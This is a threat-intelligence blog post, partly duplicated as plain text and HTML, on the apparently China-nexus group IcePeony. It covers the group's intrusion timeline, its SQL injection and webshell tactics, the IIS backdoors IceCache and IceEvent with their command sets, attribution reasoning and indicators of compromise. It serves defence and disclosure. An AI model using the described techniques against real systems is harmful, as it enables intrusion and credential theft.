file transmission functions. TYPE-A Description EXEC / EXEC_PRO Command to the execution of a process SOCKS_HELLO Command to SOCKS protocol initial handshake message SOCKS_CONNECT Command to indicate a connection request with the SOCKS protocol SOCKS_DISCONNECT Command to indicate disconnection with SOCKS protocol SOCKS_READ Command to reading of data in SOCKS protocol SOCKS_FORWARD Command to instruct data transfer via SOCKS protocol PROXY_ADD Command to add a proxy PROXY_LIST Command to list a proxy PROXY_DEL Command to del a proxy PROXY_CLEAR Command to clear all proxy settings PROXY_SET_JS Set the JavaScript PROXY_GET_JS Get set the JavaScript PROXY_ALLOW_PC Allowed PC settings PROXY_CACHE_CLEAR Command to clear the proxy cache PROXY_CACHE_TIME Command to set proxy cache time FILE_UPLOAD Upload Files FILE_DOWNLOAD Download Files TYPE-B Description EXEC / EXEC_PRO Command that directs the execution of a process SOCKS_HELLO SOCKS protocol initial handshake message SOCKS_CONNECT Command to indicate a connection request with the SOCKS protocol SOCKS_DISCONNECT Command to indicate disconnection with SOCKS protocol SOCKS_READ Command that directs reading of data in SOCKS protocol SOCKS_FORWARD Command to instruct data transfer via SOCKS protocol PROXY_ADD Command to add a proxy PROXY_LIST Command to list a proxy PROXY_DEL Command to del a proxy PROXY_CLEAR Command to clear all proxy settings FILE_UPLOAD / FILE_UPLOAD_PRO Upload Files FILE_DOWNLOAD / FILE_DOWNLOAD_PRO Download Files IIS_VERSION Show IIS version These are the IceCache modules found so far. The first sample we are aware of was compiled in August 2023 and submitted to VirusTotal in October. Since there is no discrepancy between the compille time and the first submission, we believe the dates are reliable. Many new samples have also been found since 2024. Most of the submitters are from India, which matches the victim information we have gathered from OpenDir data. The number of commands has change over time. It is show that the malware’s developers have made improvements while continuing their intrusion operations. sha256[:8] Compile Time First Submission Submitter Cmd Num X-Token TYPE 5b16d153 2024-07-17 09:11:14 2024-08-03 04:58:20 c8d0b2b9 (ID) 20 tn7rM2851XVvOFbc B 484e2740 2024-06-21 03:05:15 2024-08-07 09:25:53 39d4d6d2 - email 20 tn7rM2851XVvOFbc B 11e90e24 2024-06-05 03:52:48 2024-06-18 12:21:50 d9cb313c (ID) 20 tn7rM2851XVvOFbc B b8d030ed 2024-06-05 03:52:41 2024-06-18 10:47:18 408f1927 (ID) 20 tn7rM2851XVvOFbc B ceb47274 2024-04-25 09:53:26 2024-08-02 21:50:50 06ac9f47 (BR) 20 tn7rM2851XVvOFbc B d1955169 2024-04-21 11:29:25 2024-06-18 12:24:39 d9cb313c (ID) 18 tn7rM2851XVvOFbc B de8f58f0 2024-04-21 11:29:10 2024-06-18 10:49:53 408f1927 (ID) 18 tn7rM2851XVvOFbc B 53558af 2024-03-27 05:08:50 2024-04-19 07:57:19 c2440bbf (ID) 18 tn7rM2851XVvOFbc B 0b8b10a2 2024-03-27 05:08:57 2024-04-18 13:54:16 c2440bbf (ID) 18 tn7rM2851XVvOFbc B a66627cc 2024-02-20 09:36:12 2024-03-12 15:17:55 a6412166 (VN) 16 cbFOvVX1582Mr7nt A e5f520d9 2024-02-01 09:32:21 2024-07-17 09:30:54 24761b38 (SG) 24 cbFOvVX1582Mr7nt A 3eb56218 2023-12-07 03:04:16 2024-02-20 13:54:02 0f09a1ae (ID) 24 cbFOvVX1582Mr7nt A 5fd5e99f 2023-09-27 00:50:46 2024-03-24 08:59:02 Ca43fb0f (ID) 24 cbFOvVX1582Mr7nt A 0eb60e4c 2023-08-23 09:11:24 2023-10-18 10:11:00 0e8f2a34 (VN) 18 cbFOvVX1582Mr7nt A IceEvent IceEvent is a simple passive-mode backdoor that installed as a service. PDB Path C:\Users\power\Documents\Visual Studio 2017\Projects\WinService\x64\Release\WinService.pdb Two types have been identified based on the command format. Both types only have the minimum necessary commands. The older type was discovered in September 2023, and several new types were found in April of this year. All of these were submitted from India. TYPE-A Description FILE: Command to Reading files via sockets CMD: Command to the execution of a process TYPE-B Description UPFILE Upload Files DOWNFILE Download Files CMD Command to the execution of a process sha256[:8] Compile Time First Submission Submitter Cmd Num TYPE 80e83118 2024-04-25 09:50:58 2024-07-25 05:43:08 INDIA (99003aca) 3 B 9aba997b 2024-04-30 04:48:48 2024-06-14 05:46:49 INDIA (060734bd) 3 B 9a0b0439 2024-04-25 09:50:58 2024-06-14 05:00:08 INDIA (060734bd) 3 B bc94da1a 2023-08-23 08:52:46 2023-09-05 03:03:57 INDIA (81f8b666) 2 A Similarities We believe that IceEvent was developed because a simple passive backdoor was needed during intrusions, based on code similarities with IceCache. Both IceCache and IceEvent use the same key for XOR to encode communication data. And PDB information shows that the same developer created both malware. This is the XOR-based data encoding process used for communication data, which is equal to both malware. This is the command execution process equal to both malware. Since the function calls and branching processes are exactly the same, we believe they were compiled from the same source code. Other commands also match perfectly. The communication data of IceCache and IceEvent is only encoded using the XOR process mentioned earlier, making it easy to decode. Here is an example of decoding the data during command execution. Attribution We investigated the attacker’s activity times based on the timestamp information in the zsh_history file. As a result, we found that the attacker is likely operating in the UTC+8 time zone. Surprisingly, the attacker works from 8 a.m. to 10 p.m., which is a 14-hour workday. They are remarkably diligent workers. Similarly, we investigated the changes in activity based on the day of the week. It seems that the attackers work six days a week. While they are less active on Fridays and Saturdays, their only full day off appears to be Sunday. This investigation suggests that the attackers are not conducting these attacks as personal activities, but are instead engaging in them as part of organized, professional operations. By the way, have you heard of the term “996 working hour system”? This term originated in China’s IT industry. In China’s IT industry, long working hours see as a problem. It refers to working from 9 a.m. to 9 p.m.,six days a week. Such hard work conditions are called the “996 working hour system”. IcePeony might be working under the 996 working hour system. https://en.wikipedia.org/wiki/996_working_hour_system Next, There is a very simple example to consider when discussing attribution. IcePeony sometimes includes Simplified Chinese comments in the tools they use. Here, we provide an example of a wrapper script for the IceCache Client. From this, we can conclude that IcePeony is a threat actor from a region where Simplified Chinese is commonly used. IcePeony uses an original malware called IceCache. As previously mentioned, IceCache is based on reGeorge. More specifically, IceCache contains a string referring to a project named reGeorgGo. Upon investigating reGeorgGo, We found that it was developed by a Chinese security engineer. There is no other information about this project on the internet, aside from the developer’s blog. It was a not well-known tool. However, the publicly available reGeorgGo is a tool with only three arguments, where as IceCache has more commands added to it. https://github.com/zz1gg/secdemo/tree/main/proxy/reGeorgGo Let’s examine attribution from another side. In this attack campaign, IcePeony targeted India, Mauritius, and Vietnam. While attacks on India and Vietnam are generally not uncommon. What about Mauritius? Mauritius is a small country located in the Indian Ocean. Interestingly, Mauritius has recently formed a cooperation with India. They are wary of China’s expansion into the Indian Ocean and have begun various forms of collaboration to counter this influence. https://www.mea.gov.in/newsdetail1.htm?12042/ We summarize the attribution information using the Diamond Model. IcePeony consists of Simplified Chinese speakers who show interest in the governments of Indian Ocean countries and work under the 996 working hour system. They prefer open-source software developed in Chinese-speaking regions and use their original malware, IceCache and IceEvent. In attacks on the Indian government, they used VPSs located in the Indian region. Additionally, the governments and education sectors in Mauritius and Vietnam were also targeted. Wrap-Up In this blog post, we introduced IcePeony. IcePeony is a newly emerging attack group. Our investigation shows that they have been active since at least 2023. Their primary targets are countries in Asia, such as India and Vietnam. The log files we analyzed recorded attempts to attack over 200 different Indian government websites. IcePeony typically attempts SQL Injection attacks on publicly accessible web servers. If vulnerabilities are found, they install web shells or execute malware. Ultimately, they aim to steal credentials. We suspect that IcePeony operates as a group of individuals conducting cyberattacks in support of China’s national interests, possibly in connection with China’s maritime strategy. They remain active, and we must continue monitoring their activities closely moving forward. IoCs IP 165[.]22.211.62 64[.]227.133.248 173[.]208.156.19 173[.]208.156.144 154[.]213.17.225 103[.]150.186.219 63[.]141.255.16 204[.]12.205.10 107[.]148.37.63 103[.]99.60.119 154[.]213.17.237 45[.]195.205.88 154[.]213.17.244 103[.]99.60.93 149[.]115.231.17 149[.]115.231.39 103[.]99.60.108 Domain d45qomwkl[.]online k9ccin[.]com k8ccyn[.]com 88k8cc[.]com googlesvn[.]com IceCache 484e274077ab6f9354bf71164a8edee4dc4672fcfbf05355958785824fe0468f 5b16d1533754c9e625340c4fc2c1f76b11f37eb801166ccfb96d2aa02875a811 ceb47274f4b6293df8904c917f423c2f07f1f31416b79f3b42b6d64e65dcfe1b e5f520d95cbad6ac38eb6badbe0ad225f133e0e410af4e6df5a36b06813e451b d1955169cd8195ecedfb85a3234e4e6b191f596e493904ebca5f44e176f3f950 11e90e2458a97957064a3d3f508fa6dadae19f632b45ff9523b7def50ebacb63 de8f58f008ddaa60b5cf1b729ca03f276d2267e0a80b584f2f0723e0fac9f76c b8d030ed55bfb6bc4fdc9fe34349ef502561519a79166344194052f165d69681 535586af127e85c5561199a9a1a3254d554a6cb97200ee139c5ce23e68a932bd 0b8b10a2ff68cb2aa3451eedac4a8af4bd147ef9ddc6eb84fc5b01a65fca68fd 5fd5e99fc503831b71f4072a335f662d1188d7bc8ca2340706344fb974c7fe46 3eb56218a80582a79f8f4959b8360ada1b5e471d723812423e9d68354b6e008c a66627cc13f827064b7fcea643ab31b34a7cea444d85acc4e146d9f2b2851cf6 0eb60e4c5dc7b06b719e9dbd880eb5b7514272dc0d11e4760354f8bb44841f77 IceEvent 80e831180237b819e14c36e4af70304bc66744d26726310e3c0dd95f1740ee58 9a0b0439e6fd2403f764acf0527f2365a4b9a98e9643cd5d03ccccf3825a732e 9aba997bbf2f38f68ad8cc3474ef68eedd0b99e8f7ce39045f1d770e2af24fea bc94da1a066cbb9bdee7a03145609d0f9202b426a52aca19cc8d145b4175603b

<img src="https://nao-sec.org/assets/2024-10-17/top.png" alt="" /> This blog post is based on “IcePeony with the ‘996’ work culture” that we presented at VB2024. We are grateful to Virus Bulletin for giving us the opportunity to present. <a href="https://www.virusbulletin.com/conference/vb2024/abstracts/icepeony-996-work-culture/">https://www.virusbulletin.com/conference/vb2024/abstracts/icepeony-996-work-culture/</a> <h2 id="tldr">tl;dr</h2> We have discovered a previously unknown China-nexus APT group, which we have named “IcePeony”. Due to operational mistakes, they exposed their resources, allowing us to uncover details of their attacks. <ul> <li>IcePeony is a China-nexus APT group that has been active since at least 2023. They have targeted government agencies, academic institutions, and political organizations in countries such as India, Mauritius, and Vietnam.</li> <li>Their attacks typically start with SQL Injection, followed by compromise via webshells and backdoors. Interestingly, they use a custom IIS malware called “IceCache”.</li> <li>Through extensive analysis, we strongly believe that IcePeony is a China-nexus APT group, operating under harsh work conditions.</li> </ul> <h2 id="icepeony">IcePeony</h2> IcePeony is an unknown attack group. Our research shows that they have been active since at least 2023. They mainly target Asian countries, such as India and Vietnam. In the log files we analyzed, there were over 200 attempts to attack various government websites in India. They use SQL injection attacks on public web servers. If they find a vulnerability, they install a webshell or malware. Ultimately, their goal is to steal credentials. We believe IcePeony works for China’s national interests. It is possible that they prioritize China’s maritime strategy. <img src="https://nao-sec.org/assets/2024-10-17/1.png" alt="" /> Our research found that IcePeony targeted government and academic institutions in India, political parties in Vietnam, and government institutions in Mauritius. Recently, they may have also attacked Brazil. It is likely that they will expand their targets in the future. <h2 id="opsec-fail">OPSEC fail</h2> In July, we identified a host that was publicly exposing various attack tools, including CobaltStrike and sqlmap, via an open directory. What made this discovery even more compelling was the presence of a zsh_history file. <img src="https://nao-sec.org/assets/2024-10-17/2.png" width="60%" /> One of the most interesting findings was the zsh_history file. Similar to bash_history, the zsh_history file records command history. However, zsh_history also logs timestamps, allowing us to pinpoint the exact time each command was executed. This enabled us to construct a highly detailed timeline of the attack. Unlike a typical timeline created by an IR or SOC analyst, this one offers insight from the attacker’s perspective. We could observe their trial-and-error process and how they executed the intrusion. <img src="https://nao-sec.org/assets/2024-10-17/3.png" alt="" /> The zsh_history was not the only interesting file. There were many others. For example, IcePeony had configured several helper commands in their alias file, including shortcuts to simplify lengthy commands and commands to quickly access help information. Here is an example with Mimikatz. By typing “hPass,” the attacker could display basic tutorials for Mimikatz. This improved their effectiveness during attacks. <img src="https://nao-sec.org/assets/2024-10-17/4.png" alt="" /> <h2 id="intrusion-timeline">Intrusion Timeline</h2> We obtained two weeks’ worth of command history from the zsh_history. Let’s go through the events of each day. <img src="https://nao-sec.org/assets/2024-10-17/5.png" alt="" /> On day-1, the attacker attempted SQL injections on several government websites. When the exploit succeeded, they installed a webshell or IceCache, establishing a foothold for the attack. On day-2, they reviewed the domain information of compromised hosts and created accounts for further exploitation. On day three, which was a Sunday, no actions were taken. On day-3, which was a Sunday, they did not perform any actions. It seems the attacker does not work on Sundays. On day-4, they used IceCache to configure proxy rules. We will explain this in more detail later. On day-5, the attacker expanded their reach by attempting more SQL injections on other government websites. On day-6, they used various tools, including IcePeony’s custom tool called StaX and a rootkit called Diamorphine. On day-7, they continued to attack other hosts using tools like URLFinder and sqlmap. <img src="https://nao-sec.org/assets/2024-10-17/6.png" alt="" /> On day-8, they used IceCache to steal information from the compromised environment, especially focusing on domain users. On day-9, they were quiet and only performed connection checks. On day-10, they did nothing since it was a Sunday. On day-11, they used tools like craXcel and WmiExec. They used craXcel, an open-source tool, to unlock password-protected Microsoft Office files. On day-12, they used IceCache to add proxy rules and set persistence with scheduled tasks. On day-13 and day-14, they explored other hosts for further exploitation. Over the course of two weeks, the attacker utilized a variety of tools and commands to compromise government websites and exfiltrate information. <h2 id="tools">Tools</h2> IcePeony uses a wide range of tools, with a particular preference for open-source ones. Here, we will highlight only the most distinctive tools they use. <h3 id="stax">StaX</h3> StaX is a customized variant of the open-source tool Stowaway, a high-performance proxy tool. The attacker enhanced Stowaway with custom processing. Based on development strings, we called this version StaX. <img src="https://nao-sec.org/assets/2024-10-17/9.png" width="70%" /> StaX included encryption for communication targets specified in active mode using Custom Base64 and AES. <img src="https://nao-sec.org/assets/2024-10-17/7.png" alt="" /> <img src="https://nao-sec.org/assets/2024-10-17/8.png" alt="" /> <h3 id="proxychains">ProxyChains</h3> ProxyChains is an open-source proxy tool. The attacker used ProxyChains to run script files on victim hosts. <img src="https://nao-sec.org/assets/2024-10-17/10.png" alt="" /> info.sh is a script that collects system information from the compromised environment. It gathers environment information, user information, installed tool versions, network settings, SSH configuration files, and command history. linux_back.sh is a script for backdoors and persistence. It downloads and runs a backdoor shell script from the server and creates backdoor users. Interestingly, they installed a rootkit called Diamorphine, which is available on GitHub. <img src="https://nao-sec.org/assets/2024-10-17/11.png" alt="" /> <h2 id="malware">Malware</h2> The IcePeony server contained malware targeting IIS, which we named IceCache. They used IceCache to attack the attack surface server. Additionally, during the investigation, we discovered another related malware, which we called IceEvent. Although no logs of using IceEvent were found. We believe it was used to compromise another computer that was not connected to the internet. <img src="https://nao-sec.org/assets/2024-10-17/12.png" alt="" /> <h3 id="icecache">IceCache</h3> IceCache is an ELF64 binary developed in Go language. It is customized based on the open-source software reGeorge. <img src="https://nao-sec.org/assets/2024-10-17/13.png" width="60%" /> To facilitate their intrusion operations, they added file transmission commands and command execution functionality. <img src="https://nao-sec.org/assets/2024-10-17/14.png" alt="" /> IceCache module is installed and run on IIS servers. The number of commands change, but they are classified into two types based on authentication tokens. We found files with remaining PDB information. These files were developed by a user named “power” in a project called “cachsess” <table> <thead> <tr> <th>PDB Path</th> </tr> </thead> <tbody> <tr> <td>C:\Users\power\documents\visual studio 2017\Projects\cachsess\x64\Release\cachsess.pdb</td> </tr> <tr> <td>C:\Users\power\Documents\Visual Studio 2017\Projects\cachsess\Release\cachsess32.pdb</td> </tr> </tbody> </table> The number of commands changes over time, but it includes command execution functions, SOCKS proxy functions, and file transmission functions. <table> <thead> <tr> <th>TYPE-A</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>EXEC / EXEC_PRO</td> <td>Command to the execution of a process</td> </tr> <tr> <td>SOCKS_HELLO</td> <td>Command to SOCKS protocol initial handshake message</td> </tr> <tr> <td>SOCKS_CONNECT</td> <td>Command to indicate a connection request with the SOCKS protocol</td> </tr> <tr> <td>SOCKS_DISCONNECT</td> <td>Command to indicate disconnection with SOCKS protocol</td> </tr> <tr> <td>SOCKS_READ</td> <td>Command to reading of data in SOCKS protocol</td> </tr> <tr> <td>SOCKS_FORWARD</td> <td>Command to instruct data transfer via SOCKS protocol</td> </tr> <tr> <td>PROXY_ADD</td> <td>Command to add a proxy</td> </tr> <tr> <td>PROXY_LIST</td> <td>Command to list a proxy</td> </tr> <tr> <td>PROXY_DEL</td> <td>Command to del a proxy</td> </tr> <tr> <td>PROXY_CLEAR</td> <td>Command to clear all proxy settings</td> </tr> <tr> <td>PROXY_SET_JS</td> <td>Set the JavaScript</td> </tr> <tr> <td>PROXY_GET_JS</td> <td>Get set the JavaScript</td> </tr> <tr> <td>PROXY_ALLOW_PC</td> <td>Allowed PC settings</td> </tr> <tr> <td>PROXY_CACHE_CLEAR</td> <td>Command to clear the proxy cache</td> </tr> <tr> <td>PROXY_CACHE_TIME</td> <td>Command to set proxy cache time</td> </tr> <tr> <td>FILE_UPLOAD</td> <td>Upload Files</td> </tr> <tr> <td>FILE_DOWNLOAD</td> <td>Download Files</td> </tr> </tbody> </table> <table> <thead> <tr> <th>TYPE-B</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>EXEC / EXEC_PRO</td> <td>Command that directs the execution of a process</td> </tr> <tr> <td>SOCKS_HELLO</td> <td>SOCKS protocol initial handshake message</td> </tr> <tr> <td>SOCKS_CONNECT</td> <td>Command to indicate a connection request with the SOCKS protocol</td> </tr> <tr> <td>SOCKS_DISCONNECT</td> <td>Command to indicate disconnection with SOCKS protocol</td> </tr> <tr> <td>SOCKS_READ</td> <td>Command that directs reading of data in SOCKS protocol</td> </tr> <tr> <td>SOCKS_FORWARD</td> <td>Command to instruct data transfer via SOCKS protocol</td> </tr> <tr> <td>PROXY_ADD</td> <td>Command to add a proxy</td> </tr> <tr> <td>PROXY_LIST</td> <td>Command to list a proxy</td> </tr> <tr> <td>PROXY_DEL</td> <td>Command to del a proxy</td> </tr> <tr> <td>PROXY_CLEAR</td> <td>Command to clear all proxy settings</td> </tr> <tr> <td>FILE_UPLOAD / FILE_UPLOAD_PRO</td> <td>Upload Files</td> </tr> <tr> <td>FILE_DOWNLOAD / FILE_DOWNLOAD_PRO</td> <td>Download Files</td> </tr> <tr> <td>IIS_VERSION</td> <td>Show IIS version</td> </tr> </tbody> </table> These are the IceCache modules found so far. The first sample we are aware of was compiled in August 2023 and submitted to VirusTotal in October. Since there is no discrepancy between the compille time and the first submission, we believe the dates are reliable. Many new samples have also been found since 2024. Most of the submitters are from India, which matches the victim information we have gathered from OpenDir data. The number of commands has change over time. It is show that the malware’s developers have made improvements while continuing their intrusion operations. <table> <thead> <tr> <th>sha256[:8]</th> <th>Compile Time</th> <th>First Submission</th> <th>Submitter</th> <th>Cmd Num</th> <th>X-Token</th> <th>TYPE</th> </tr> </thead> <tbody> <tr> <td>5b16d153</td> <td>2024-07-17 09:11:14</td> <td>2024-08-03 04:58:20</td> <td>c8d0b2b9 (ID)</td> <td>20</td> <td>tn7rM2851XVvOFbc</td> <td>B</td> </tr> <tr> <td>484e2740</td> <td>2024-06-21 03:05:15</td> <td>2024-08-07 09:25:53</td> <td>39d4d6d2 - email</td> <td>20</td> <td>tn7rM2851XVvOFbc</td> <td>B</td> </tr> <tr> <td>11e90e24</td> <td>2024-06-05 03:52:48</td> <td>2024-06-18 12:21:50</td> <td>d9cb313c (ID)</td> <td>20</td> <td>tn7rM2851XVvOFbc</td> <td>B</td> </tr> <tr> <td>b8d030ed</td> <td>2024-06-05 03:52:41</td> <td>2024-06-18 10:47:18</td> <td>408f1927 (ID)</td> <td>20</td> <td>tn7rM2851XVvOFbc</td> <td>B</td> </tr> <tr> <td>ceb47274</td> <td>2024-04-25 09:53:26</td> <td>2024-08-02 21:50:50</td> <td>06ac9f47 (BR)</td> <td>20</td> <td>tn7rM2851XVvOFbc</td> <td>B</td> </tr> <tr> <td>d1955169</td> <td>2024-04-21 11:29:25</td> <td>2024-06-18 12:24:39</td> <td>d9cb313c (ID)</td> <td>18</td> <td>tn7rM2851XVvOFbc</td> <td>B</td> </tr> <tr> <td>de8f58f0</td> <td>2024-04-21 11:29:10</td> <td>2024-06-18 10:49:53</td> <td>408f1927 (ID)</td> <td>18</td> <td>tn7rM2851XVvOFbc</td> <td>B</td> </tr> <tr> <td>53558af</td> <td>2024-03-27 05:08:50</td> <td>2024-04-19 07:57:19</td> <td>c2440bbf (ID)</td> <td>18</td> <td>tn7rM2851XVvOFbc</td> <td>B</td> </tr> <tr> <td>0b8b10a2</td> <td>2024-03-27 05:08:57</td> <td>2024-04-18 13:54:16</td> <td>c2440bbf (ID)</td> <td>18</td> <td>tn7rM2851XVvOFbc</td> <td>B</td> </tr> <tr> <td>a66627cc</td> <td>2024-02-20 09:36:12</td> <td>2024-03-12 15:17:55</td> <td>a6412166 (VN)</td> <td>16</td> <td>cbFOvVX1582Mr7nt</td> <td>A</td> </tr> <tr> <td>e5f520d9</td> <td>2024-02-01 09:32:21</td> <td>2024-07-17 09:30:54</td> <td>24761b38 (SG)</td> <td>24</td> <td>cbFOvVX1582Mr7nt</td> <td>A</td> </tr> <tr> <td>3eb56218</td> <td>2023-12-07 03:04:16</td> <td>2024-02-20 13:54:02</td> <td>0f09a1ae (ID)</td> <td>24</td> <td>cbFOvVX1582Mr7nt</td> <td>A</td> </tr> <tr> <td>5fd5e99f</td> <td>2023-09-27 00:50:46</td> <td>2024-03-24 08:59:02</td> <td>Ca43fb0f (ID)</td> <td>24</td> <td>cbFOvVX1582Mr7nt</td> <td>A</td> </tr> <tr> <td>0eb60e4c</td> <td>2023-08-23 09:11:24</td> <td>2023-10-18 10:11:00</td> <td>0e8f2a34 (VN)</td> <td>18</td> <td>cbFOvVX1582Mr7nt</td> <td>A</td> </tr> </tbody> </table> <h3 id="iceevent">IceEvent</h3> IceEvent is a simple passive-mode backdoor that installed as a service. <table> <thead> <tr> <th>PDB Path</th> </tr> </thead> <tbody> <tr> <td>C:\Users\power\Documents\Visual Studio 2017\Projects\WinService\x64\Release\WinService.pdb</td> </tr> </tbody> </table> Two types have been identified based on the command format. Both types only have the minimum necessary commands. The older type was discovered in September 2023, and several new types were found in April of this year. All of these were submitted from India. <table> <thead> <tr> <th>TYPE-A</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>FILE:</td> <td>Command to Reading files via sockets</td> </tr> <tr> <td>CMD:</td> <td>Command to the execution of a process</td> </tr> </tbody> </table> <table> <thead> <tr> <th>TYPE-B</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>UPFILE</td> <td>Upload Files</td> </tr> <tr> <td>DOWNFILE</td> <td>Download Files</td> </tr> <tr> <td>CMD</td> <td>Command to the execution of a process</td> </tr> </tbody> </table> <table> <thead> <tr> <th>sha256[:8]</th> <th>Compile Time</th> <th>First Submission</th> <th>Submitter</th> <th>Cmd Num</th> <th>TYPE</th> </tr> </thead> <tbody> <tr> <td>80e83118</td> <td>2024-04-25 09:50:58</td> <td>2024-07-25 05:43:08</td> <td>INDIA (99003aca)</td> <td>3</td> <td>B</td> </tr> <tr> <td>9aba997b</td> <td>2024-04-30 04:48:48</td> <td>2024-06-14 05:46:49</td> <td>INDIA (060734bd)</td> <td>3</td> <td>B</td> </tr> <tr> <td>9a0b0439</td> <td>2024-04-25 09:50:58</td> <td>2024-06-14 05:00:08</td> <td>INDIA (060734bd)</td> <td>3</td> <td>B</td> </tr> <tr> <td>bc94da1a</td> <td>2023-08-23 08:52:46</td> <td>2023-09-05 03:03:57</td> <td>INDIA (81f8b666)</td> <td>2</td> <td>A</td> </tr> </tbody> </table> <h3 id="similarities">Similarities</h3> We believe that IceEvent was developed because a simple passive backdoor was needed during intrusions, based on code similarities with IceCache. Both IceCache and IceEvent use the same key for XOR to encode communication data. And PDB information shows that the same developer created both malware. This is the XOR-based data encoding process used for communication data, which is equal to both malware. <img src="https://nao-sec.org/assets/2024-10-17/15.png" alt="" /> This is the command execution process equal to both malware. Since the function calls and branching processes are exactly the same, we believe they were compiled from the same source code. Other commands also match perfectly. <img src="https://nao-sec.org/assets/2024-10-17/16.png" alt="" /> The communication data of IceCache and IceEvent is only encoded using the XOR process mentioned earlier, making it easy to decode. Here is an example of decoding the data during command execution. <img src="https://nao-sec.org/assets/2024-10-17/17.png" alt="" /> <h2 id="attribution">Attribution</h2> We investigated the attacker’s activity times based on the timestamp information in the zsh_history file. As a result, we found that the attacker is likely operating in the UTC+8 time zone. Surprisingly, the attacker works from 8 a.m. to 10 p.m., which is a 14-hour workday. They are remarkably diligent workers. <img src="https://nao-sec.org/assets/2024-10-17/18.png" alt="" /> Similarly, we investigated the changes in activity based on the day of the week. It seems that the attackers work six days a week. While they are less active on Fridays and Saturdays, their only full day off appears to be Sunday. This investigation suggests that the attackers are not conducting these attacks as personal activities, but are instead engaging in them as part of organized, professional operations. <img src="https://nao-sec.org/assets/2024-10-17/19.png" alt="" /> By the way, have you heard of the term “996 working hour system”? This term originated in China’s IT industry. In China’s IT industry, long working hours see as a problem. It refers to working from 9 a.m. to 9 p.m.,six days a week. Such hard work conditions are called the “996 working hour system”. IcePeony might be working under the 996 working hour system. <img src="https://nao-sec.org/assets/2024-10-17/20.png" alt="" /> <a href="https://en.wikipedia.org/wiki/996_working_hour_system">https://en.wikipedia.org/wiki/996_working_hour_system</a> Next, There is a very simple example to consider when discussing attribution. IcePeony sometimes includes Simplified Chinese comments in the tools they use. Here, we provide an example of a wrapper script for the IceCache Client. From this, we can conclude that IcePeony is a threat actor from a region where Simplified Chinese is commonly used. <img src="https://nao-sec.org/assets/2024-10-17/21.png" alt="" /> IcePeony uses an original malware called IceCache. As previously mentioned, IceCache is based on reGeorge. More specifically, IceCache contains a string referring to a project named reGeorgGo. Upon investigating reGeorgGo, We found that it was developed by a Chinese security engineer. There is no other information about this project on the internet, aside from the developer’s blog. It was a not well-known tool. However, the publicly available reGeorgGo is a tool with only three arguments, where as IceCache has more commands added to it. <img src="https://nao-sec.org/assets/2024-10-17/22.png" alt="" /> <a href="https://github.com/zz1gg/secdemo/tree/main/proxy/reGeorgGo">https://github.com/zz1gg/secdemo/tree/main/proxy/reGeorgGo</a> Let’s examine attribution from another side. In this attack campaign, IcePeony targeted India, Mauritius, and Vietnam. While attacks on India and Vietnam are generally not uncommon. What about Mauritius? <img src="https://nao-sec.org/assets/2024-10-17/23.png" width="50%" /> Mauritius is a small country located in the Indian Ocean. Interestingly, Mauritius has recently formed a cooperation with India. They are wary of China’s expansion into the Indian Ocean and have begun various forms of collaboration to counter this influence. <img src="https://nao-sec.org/assets/2024-10-17/24.png" alt="" /> <a href="https://www.mea.gov.in/newsdetail1.htm?12042/">https://www.mea.gov.in/newsdetail1.htm?12042/</a> We summarize the attribution information using the Diamond Model. IcePeony consists of Simplified Chinese speakers who show interest in the governments of Indian Ocean countries and work under the 996 working hour system. They prefer open-source software developed in Chinese-speaking regions and use their original malware, IceCache and IceEvent. In attacks on the Indian government, they used VPSs located in the Indian region. Additionally, the governments and education sectors in Mauritius and Vietnam were also targeted. <img src="https://nao-sec.org/assets/2024-10-17/25.png" alt="" /> <h2 id="wrap-up">Wrap-Up</h2> In this blog post, we introduced IcePeony. IcePeony is a newly emerging attack group. Our investigation shows that they have been active since at least 2023. Their primary targets are countries in Asia, such as India and Vietnam. The log files we analyzed recorded attempts to attack over 200 different Indian government websites. IcePeony typically attempts SQL Injection attacks on publicly accessible web servers. If vulnerabilities are found, they install web shells or execute malware. Ultimately, they aim to steal credentials. We suspect that IcePeony operates as a group of individuals conducting cyberattacks in support of China’s national interests, possibly in connection with China’s maritime strategy. They remain active, and we must continue monitoring their activities closely moving forward. <h2 id="iocs">IoCs</h2> <h3 id="ip">IP</h3> <ul> <li>165[.]22.211.62</li> <li>64[.]227.133.248</li> <li>173[.]208.156.19</li> <li>173[.]208.156.144</li> <li>154[.]213.17.225</li> <li>103[.]150.186.219</li> <li>63[.]141.255.16</li> <li>204[.]12.205.10</li> <li>107[.]148.37.63</li> <li>103[.]99.60.119</li> <li>154[.]213.17.237</li> <li>45[.]195.205.88</li> <li>154[.]213.17.244</li> <li>103[.]99.60.93</li> <li>149[.]115.231.17</li> <li>149[.]115.231.39</li> <li>103[.]99.60.108</li> </ul> <h3 id="domain">Domain</h3> <ul> <li>d45qomwkl[.]online</li> <li>k9ccin[.]com</li> <li>k8ccyn[.]com</li> <li>88k8cc[.]com</li> <li>googlesvn[.]com</li> </ul> <h3 id="icecache-1">IceCache</h3> <ul> <li>484e274077ab6f9354bf71164a8edee4dc4672fcfbf05355958785824fe0468f</li> <li>5b16d1533754c9e625340c4fc2c1f76b11f37eb801166ccfb96d2aa02875a811</li> <li>ceb47274f4b6293df8904c917f423c2f07f1f31416b79f3b42b6d64e65dcfe1b</li> <li>e5f520d95cbad6ac38eb6badbe0ad225f133e0e410af4e6df5a36b06813e451b</li> <li>d1955169cd8195ecedfb85a3234e4e6b191f596e493904ebca5f44e176f3f950</li> <li>11e90e2458a97957064a3d3f508fa6dadae19f632b45ff9523b7def50ebacb63</li> <li>de8f58f008ddaa60b5cf1b729ca03f276d2267e0a80b584f2f0723e0fac9f76c</li> <li>b8d030ed55bfb6bc4fdc9fe34349ef502561519a79166344194052f165d69681</li> <li>535586af127e85c5561199a9a1a3254d554a6cb97200ee139c5ce23e68a932bd</li> <li>0b8b10a2ff68cb2aa3451eedac4a8af4bd147ef9ddc6eb84fc5b01a65fca68fd</li> <li>5fd5e99fc503831b71f4072a335f662d1188d7bc8ca2340706344fb974c7fe46</li> <li>3eb56218a80582a79f8f4959b8360ada1b5e471d723812423e9d68354b6e008c</li> <li>a66627cc13f827064b7fcea643ab31b34a7cea444d85acc4e146d9f2b2851cf6</li> <li>0eb60e4c5dc7b06b719e9dbd880eb5b7514272dc0d11e4760354f8bb44841f77</li> </ul> <h3 id="iceevent-1">IceEvent</h3> <ul> <li>80e831180237b819e14c36e4af70304bc66744d26726310e3c0dd95f1740ee58</li> 